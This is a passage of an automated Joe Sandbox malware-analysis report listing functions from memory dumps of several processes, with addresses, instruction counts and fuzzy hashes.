                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b8a0000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e31091e83e3c1f32ac0a57123f863147dd8f45a952debe84eddfca13acde7636
                                                    • Instruction ID: cb849a22977e38c8427cde7a0629960bdc436688e13c97535ad047a4b87a5389
                                                    • Opcode Fuzzy Hash: e31091e83e3c1f32ac0a57123f863147dd8f45a952debe84eddfca13acde7636
                                                    • Instruction Fuzzy Hash: F5E0C261F0890F4AFB68DF48C4626BE6FB1EF58340F40013AC019962E5DE3429838781
                                                    Function 00007FFD9B8906A5 Relevance: .0, Instructions: 13COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b890000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e9c3a768ca4a15c833beaef444c98401a766ec53a568349f7243ec7c344a2d83
                                                    • Instruction ID: ad2f4052b067b61a18b6528d92cd979851e1deb705113a0321c9aa4fc3d8a01e
                                                    • Opcode Fuzzy Hash: e9c3a768ca4a15c833beaef444c98401a766ec53a568349f7243ec7c344a2d83
                                                    • Instruction Fuzzy Hash: F1C04C06F6B61F41FC3673EE98660ACA9406FDDF10FD70172D64D500E1AD4D22D54156
                                                    Function 00007FFD9B890848 Relevance: .0, Instructions: 12COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b890000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 357baf54a18fbec0c068af6c39e917b84b8ac1f83436bfccbdac3267fcba0015
                                                    • Instruction ID: f5afea7c36a37803931b794cf177333dd33fbab8ee6d41c43c70345e4a960aca
                                                    • Opcode Fuzzy Hash: 357baf54a18fbec0c068af6c39e917b84b8ac1f83436bfccbdac3267fcba0015
                                                    • Instruction Fuzzy Hash: B2C08C3461180C8FC908EB28C88480437A0FB0D200BC20090E009C7170E229DCC1C740
                                                    Function 00007FFD9B894015 Relevance: .0, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b890000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3e120c04c4eb10f0b3fc8f1e791e18cc8fe4495ba3ceb864a4627aad6cf6d767
                                                    • Instruction ID: 162c683b80fd8ed068ad2817c30b18f8267fd6e7b61e3176778b5d983e716b6d
                                                    • Opcode Fuzzy Hash: 3e120c04c4eb10f0b3fc8f1e791e18cc8fe4495ba3ceb864a4627aad6cf6d767
                                                    • Instruction Fuzzy Hash: E5C08C40F0D81A02F35AB30484316BE08439B84244FC000B0E42E872CECE8C9A4202C7
                                                    Function 00007FFD9B8A94A4 Relevance: .0, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b8a0000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dee97278fb6f60426b32520255e7376c440a1e31f19a32535e9eeaaf09880287
                                                    • Instruction ID: 24cfb49a9699547c0ce1a0d475c24580eed30f809270aea6b1a7b4e322cb6531
                                                    • Opcode Fuzzy Hash: dee97278fb6f60426b32520255e7376c440a1e31f19a32535e9eeaaf09880287
                                                    • Instruction Fuzzy Hash: 35D0C930E0455D8EEBA4DB18C491F9972B2AF48304F6001F6900DE2289CF346E808B50
                                                    Function 00007FFD9B8906C8 Relevance: .0, Instructions: 8COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b890000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7ae72c574db76d6c85465251d491aaf8998b500b8fcddd359cf8eba7dae60f7b
                                                    • Instruction ID: 72f6aa97fb536398eea38e94ab17466f98f739a3eecab6c46c8b1349559f7bc5
                                                    • Opcode Fuzzy Hash: 7ae72c574db76d6c85465251d491aaf8998b500b8fcddd359cf8eba7dae60f7b
                                                    • Instruction Fuzzy Hash: F5B01200D6740F01EC2433FA08620A478406B4C600FC60070D80D50091A84D12940242
                                                    Function 00007FFD9B8B2830 Relevance: .0, Instructions: 7COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b8b1000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 73667c955eb5ee136476d9db61411991cfc2cda8e4ccc81d79df83209702400c
                                                    • Instruction ID: 17c8dd8f472622085d102e3272749eb397a870b3b4eca9167adc36b74357d375
                                                    • Opcode Fuzzy Hash: 73667c955eb5ee136476d9db61411991cfc2cda8e4ccc81d79df83209702400c
                                                    • Instruction Fuzzy Hash: C8A00204DA794E11EC2832FA1D974947C505B8D155FD621A1EC08805D6E88E16ED0293

                                                    Non-executed Functions

                                                    Function 00007FFD9B8909B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b890000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: c9$!k9$"s9$#{9
                                                    • API String ID: 0-1692736845
                                                    • Opcode ID: e04915cc82d030085f3452353eb915b34d207cd6d2f43e59546fef3118dd530a
                                                    • Instruction ID: 8f7ace8b044e1fd3fa902ae7a00ee120a14cf4ab20fe5cd60dd930381f958173
                                                    • Opcode Fuzzy Hash: e04915cc82d030085f3452353eb915b34d207cd6d2f43e59546fef3118dd530a
                                                    • Instruction Fuzzy Hash: 1841CF87B1953685E31F33FC792A9ED5B84CF8527DB0842B7E16E8A0C75C88608393E5

                                                    Executed Functions

                                                    Function 00007FFD9B8B93A0 Relevance: 1.2, Instructions: 1165COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000036.00000002.2835768585.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_54_2_7ffd9b8b0000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 053f7d4d742f219dc7e0c140ff1ad3fb316e5e193a0f825d1acf10ebf2bab626
                                                    • Instruction ID: 9a3b8ab8ae07968409587165dc50121a2ac371b8d81586dfb6de1913b72dc816
                                                    • Opcode Fuzzy Hash: 053f7d4d742f219dc7e0c140ff1ad3fb316e5e193a0f825d1acf10ebf2bab626
                                                    • Instruction Fuzzy Hash: 88721930B1D91D8FE768DB688869B7873D1FF98301F1506B9D45EC72A6DE24AD028BC1
                                                    Function 00007FFD9B8B0D78 Relevance: .3, Instructions: 258COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000036.00000002.2835768585.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_54_2_7ffd9b8b0000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 78da79c169f204af2a0c043b5306f803d598bdf47eef34e7061cae592b9b653c
                                                    • Instruction ID: 5e66cb3728bbdf736f2282829474eab8c652e64461a6800f361c9c828f9d8cc0
                                                    • Opcode Fuzzy Hash: 78da79c169f204af2a0c043b5306f803d598bdf47eef34e7061cae592b9b653c
                                                    • Instruction Fuzzy Hash: E391E071A18A9D8FE789DB68D8697A9BFE1FF99300F4101BAD049C73E6DB781401C741
                                                    Function 00007FFD9B8B0908 Relevance: .1, Instructions: 118COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000036.00000002.2835768585.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_54_2_7ffd9b8b0000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e2c0361ea08d3e068ab34cc65cd79e5233918d219d6109d272177c6085778e24
                                                    • Instruction ID: ee4f7909caa9a8bccbd22dc8ff7c9b84973d369060e2b34f7609fa3240eb4d0d
                                                    • Opcode Fuzzy Hash: e2c0361ea08d3e068ab34cc65cd79e5233918d219d6109d272177c6085778e24
                                                    • Instruction Fuzzy Hash: B221B63130D8184FDBA8EB5CE889EB977D1FB5932170505BAE58AC7136D911EC828BC1
                                                    Function 00007FFD9B8B0998 Relevance: .1, Instructions: 98COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000036.00000002.2835768585.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_54_2_7ffd9b8b0000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 237f3ecd8e2fe02df80a68ca4f7838880c6997fc3a360791a441ad1ff38ccb87
                                                    • Instruction ID: b6d5652767196f14d0b2ef7e679f1797be349ee5eea2337a9477cbdff8a7a7e8
                                                    • Opcode Fuzzy Hash: 237f3ecd8e2fe02df80a68ca4f7838880c6997fc3a360791a441ad1ff38ccb87
                                                    • Instruction Fuzzy Hash: 8621F420B1992D4FE798B77CD46AA7977D2EF9C311B4600B9E40EC32E6DD24AC424681
                                                    Function 00007FFD9B8B0C25 Relevance: .1, Instructions: 85COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000036.00000002.2835768585.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_54_2_7ffd9b8b0000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2c93d7f01058285abb435b1ca36dfe0adf6d4ba3eb74e2a53a56969c0383e992
                                                    • Instruction ID: c47415f938e1452b09bc6b9dd475864a58ed8bb8c50df11446e40cf3ac5498a3
                                                    • Opcode Fuzzy Hash: 2c93d7f01058285abb435b1ca36dfe0adf6d4ba3eb74e2a53a56969c0383e992
                                                    • Instruction Fuzzy Hash: 2E214C36B0D25D8BE716A7B9AC250EC3B60EF46324F0541F3D0488B1E3DA382646CBC1
                                                    Function 00007FFD9B8B2801 Relevance: .1, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000036.00000002.2835768585.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_54_2_7ffd9b8b0000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b619a662a8a1aa207a0a1c183d077f12ca6ebac2c4bc360522d44cf340461995
                                                    • Instruction ID: 1a4442ff085b26f4cca6aa36b7edaa11ef6e58b7a1046912bff8e2bba42e5cae
                                                    • Opcode Fuzzy Hash: b619a662a8a1aa207a0a1c183d077f12ca6ebac2c4bc360522d44cf340461995
                                                    • Instruction Fuzzy Hash: 33118431B1D91E4AEBA5EBF8A8A16FC7291FF4C311F410176C40DD31A2DE28AA448B81
                                                    Function 00007FFD9B8B08F8 Relevance: .1, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000036.00000002.2835768585.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_54_2_7ffd9b8b0000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3a7a68018b1501032a8adc41ff329f201c5811d8f0ff5f2f0fecf1f4d2ebfe06
                                                    • Instruction ID: 5d1d001d5b7d2a8bc6027946a44f861a33814cb78b96d5501db0379c460b22f5
                                                    • Opcode Fuzzy Hash: 3a7a68018b1501032a8adc41ff329f201c5811d8f0ff5f2f0fecf1f4d2ebfe06
                                                    • Instruction Fuzzy Hash: 3A012432B0E93C1BE638926D985A935B3C2EB9AA303161239D88EC3266DC11BC0347C0
                                                    Function 00007FFD9B8B0C38 Relevance: .1, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000036.00000002.2835768585.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_54_2_7ffd9b8b0000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a37429d9f6ee93498bd65e6b0d65c9e9eab658cfa8047291be4c1710037a49fd
                                                    • Instruction ID: 39bb8441bbc3fb6ce5e461b5ae709d7f4dd61152b766331b6eddc957280eaf90
                                                    • Opcode Fuzzy Hash: a37429d9f6ee93498bd65e6b0d65c9e9eab658cfa8047291be4c1710037a49fd
                                                    • Instruction Fuzzy Hash: 9211A035B1E69D8FE712DBB988651AC7FB0EF46610F1644F7C084DB1A2D63867098BC1
                                                    Function 00007FFD9B8B0C40 Relevance: .0, Instructions: 48COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000036.00000002.2835768585.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_54_2_7ffd9b8b0000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 98c708ba11f3dfb3312ff5907d9f5dba124f75378b90a34856ebbb2aac854bde
                                                    • Instruction ID: 097117e306fc8674facebbf81cd4a411e73999da7ef4d92c11ae55152ba3a0e3
                                                    • Opcode Fuzzy Hash: 98c708ba11f3dfb3312ff5907d9f5dba124f75378b90a34856ebbb2aac854bde
                                                    • Instruction Fuzzy Hash: D811A135A1E29D8FE712DBB588651AC7FB0EF46710F1645F7C084DB1A2D63867498B80
                                                    Function 00007FFD9B8B28A9 Relevance: .0, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000036.00000002.2835768585.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_54_2_7ffd9b8b0000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4aff79beb7cf9a7f6aa8383bd7a6525bb8df386d41ac7547db75da8b24888236
                                                    • Instruction ID: 4e171f7189d9f8ac87fcaebe1a45bc8ed946fe4131d605ccb2e83816adbbfe71
                                                    • Opcode Fuzzy Hash: 4aff79beb7cf9a7f6aa8383bd7a6525bb8df386d41ac7547db75da8b24888236
                                                    • Instruction Fuzzy Hash: C1017121B1A91E8BEB64EBF8D4646B86392DF98341F024175D40DC72B6DD29AA418A80
                                                    Function 00007FFD9B8B0C48 Relevance: .0, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000036.00000002.2835768585.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_54_2_7ffd9b8b0000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c80cadd879ee251539867241c43139d6d1d09a2dbffff196064e0c11036f7f9c
                                                    • Instruction ID: 83444c8315fb4cff51adf89869fb25fe4e5c90de7e737ffabc31e00173ade98c
                                                    • Opcode Fuzzy Hash: c80cadd879ee251539867241c43139d6d1d09a2dbffff196064e0c11036f7f9c
                                                    • Instruction Fuzzy Hash: 32019E35A1E28D8FE716DBB4886419C7FB0EF46710F1641F7D084DB2A2DA386B49CB80
                                                    Function 00007FFD9B8B4EBD Relevance: .0, Instructions: 40COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000036.00000002.2835768585.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_54_2_7ffd9b8b0000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e5e3f194eef11f3e169306e815a0c01db850d4d9eec5ff71481d1fe29f4a8a32
                                                    • Instruction ID: 3e5d5bc72188a45c24e245ee4533f32d40f0056392143ec808dd83fe07c62076
                                                    • Opcode Fuzzy Hash: e5e3f194eef11f3e169306e815a0c01db850d4d9eec5ff71481d1fe29f4a8a32
                                                    • Instruction Fuzzy Hash: 86017C31908A58CFDB55EB18C895A9573F0FF68310F05069AD409D72A1DB34AE41CF80
                                                    Function 00007FFD9B8B0C50 Relevance: .0, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000036.00000002.2835768585.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_54_2_7ffd9b8b0000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d33865254cd854517008d649de4936059977f060744d3d9e5956f5173e95c9b1
                                                    • Instruction ID: 981ef4f063c130993a59827c61d641010e0b1eeb4a7f0e1fc589f82dbd562880
                                                    • Opcode Fuzzy Hash: d33865254cd854517008d649de4936059977f060744d3d9e5956f5173e95c9b1
                                                    • Instruction Fuzzy Hash: 62017134E1E28D8FE716DBB4886419C7FB0EF06704F1641E7D444DB1A2DA385B448B81
                                                    Function 00007FFD9B8B291E Relevance: .0, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000036.00000002.2835768585.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_54_2_7ffd9b8b0000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 681dd678f55423f80fde8d03723e4bba8c8974644ff91c345b29d095a9e77cad
                                                    • Instruction ID: 6fafe988e421d3f094a1076b187d94784b238a36b800130199acf040eaccbd6b
                                                    • Opcode Fuzzy Hash: 681dd678f55423f80fde8d03723e4bba8c8974644ff91c345b29d095a9e77cad
                                                    • Instruction Fuzzy Hash: 19F01230A1952E8BEB65DBA4D8A47F87261EB58301F1141B9C40D961A1DD286A848F80
                                                    Function 00007FFD9B8B0B77 Relevance: .0, Instructions: 32COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000036.00000002.2835768585.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_54_2_7ffd9b8b0000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0c0a77992971adf137ee7902edc43c43fb0aa358cb22344ae9501457d2e87573
                                                    • Instruction ID: f62e16c460dcb26b4e6beae2efc1bf934b3280bade7f406cddb90ce1ef0fb7de
                                                    • Opcode Fuzzy Hash: 0c0a77992971adf137ee7902edc43c43fb0aa358cb22344ae9501457d2e87573
                                                    • Instruction Fuzzy Hash: 9EF0E53525F689DFD742AB3888A16D4BF60EF03208F5A12EAC489D7662D215545DCB41
                                                    Function 00007FFD9B8B28F1 Relevance: .0, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000036.00000002.2835768585.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_54_2_7ffd9b8b0000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8cd932901108484ecbd1028138cfcf107a4298210c603351e4cb55657a5c86bf
                                                    • Instruction ID: 73a76a5794c7a035ed2e889224a8af0dd181e20be163bda8bb398f670281643c
                                                    • Opcode Fuzzy Hash: 8cd932901108484ecbd1028138cfcf107a4298210c603351e4cb55657a5c86bf
                                                    • Instruction Fuzzy Hash: AAF03A20B1A52E8BEBA5DBE4D8A47F87351EF58301F014275C44D972B2CD29AA858EC0
                                                    Function 00007FFD9B8B708D Relevance: .0, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000036.00000002.2835768585.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_54_2_7ffd9b8b0000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c647ed6b7676fb00fa4b478319eac1b4c3ce4864710e42417a7b1a7ee6750a58
                                                    • Instruction ID: 36795496a0b6d0aea41f25093506adebda3e3fa3443fe101963dd2c471d2dce0
                                                    • Opcode Fuzzy Hash: c647ed6b7676fb00fa4b478319eac1b4c3ce4864710e42417a7b1a7ee6750a58
                                                    • Instruction Fuzzy Hash: 3EE0EC11B6D56906F7ACA3B948363B85082EB9D704F4A41BAA05EC72D3DC48298106D2
                                                    Function 00007FFD9B8B06A5 Relevance: .0, Instructions: 13COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000036.00000002.2835768585.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_54_2_7ffd9b8b0000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e9c3a768ca4a15c833beaef444c98401a766ec53a568349f7243ec7c344a2d83
                                                    • Instruction ID: 1f2daa892d04a30be6c3d89d8c5133cd697683b25ebf258cc6de1a8d595e0302
                                                    • Opcode Fuzzy Hash: e9c3a768ca4a15c833beaef444c98401a766ec53a568349f7243ec7c344a2d83
                                                    • Instruction Fuzzy Hash: 8EC00205F6B62E41E83573BB98660ACA140ABDEA10FD60176D548500A1A84D629949D6
                                                    Function 00007FFD9B8B0848 Relevance: .0, Instructions: 12COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000036.00000002.2835768585.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_54_2_7ffd9b8b0000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 357baf54a18fbec0c068af6c39e917b84b8ac1f83436bfccbdac3267fcba0015
                                                    • Instruction ID: 8a66f235dab98190b60a4ac3a23447237f41490b15899e98512aa7a0689af79e
                                                    • Opcode Fuzzy Hash: 357baf54a18fbec0c068af6c39e917b84b8ac1f83436bfccbdac3267fcba0015
                                                    • Instruction Fuzzy Hash: A2C08C30A1180C9FC908EB38C88480433A0FB0E200BC20090E009C7170E62ADCC1CB80
                                                    Function 00007FFD9B8B4015 Relevance: .0, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000036.00000002.2835768585.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_54_2_7ffd9b8b0000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 71276ba5142a20553a178279b6c8d7b64c60b1ac74e062ca6b2ab82877d6a746
                                                    • Instruction ID: d59873eed5b92a198652d0cd753867722baf3c135f6eb0e3d65f6a0b903c6d9f
                                                    • Opcode Fuzzy Hash: 71276ba5142a20553a178279b6c8d7b64c60b1ac74e062ca6b2ab82877d6a746
                                                    • Instruction Fuzzy Hash: BBC04C41F19C2A06F3A9B35494326BF44539B88648F9504B5E42E9B3CECD9C9A4202D7
                                                    Function 00007FFD9B8B06C8 Relevance: .0, Instructions: 8COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000036.00000002.2835768585.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_54_2_7ffd9b8b0000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7ae72c574db76d6c85465251d491aaf8998b500b8fcddd359cf8eba7dae60f7b
                                                    • Instruction ID: 924ed425b3336119ed9f9bd5fafa108be8f9e51428390d4056b23237080b0d05
                                                    • Opcode Fuzzy Hash: 7ae72c574db76d6c85465251d491aaf8998b500b8fcddd359cf8eba7dae60f7b
                                                    • Instruction Fuzzy Hash: 90B01200D6741F00E42433FB08720A47040AB4C200FC60070D40C500A1A84D229406D3

                                                    Non-executed Functions

                                                    Function 00007FFD9B8B09B0 Relevance: 5.2, Strings: 4, Instructions: 180COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000036.00000002.2835768585.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_54_2_7ffd9b8b0000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: c9$!k9$"s9$#{9
                                                    • API String ID: 0-1692736845
                                                    • Opcode ID: 3ab8e4725c75c1e9a79192ed547fd5c9622236f3ed42147bf41d9b16115a6997
                                                    • Instruction ID: 8b5917094ef3bf1f27f6639bba1159f0b7e73138c493bdbf1668709d3c066600
                                                    • Opcode Fuzzy Hash: 3ab8e4725c75c1e9a79192ed547fd5c9622236f3ed42147bf41d9b16115a6997
                                                    • Instruction Fuzzy Hash: B341D042B1953785E21F33FD792A8FC6B44DF8137DB0846B7E05E8A0EB5D88608792E5

                                                    Executed Functions

                                                    Function 00007FFD9B8A93A0 Relevance: 1.2, Instructions: 1185COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000037.00000002.2895561078.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_55_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
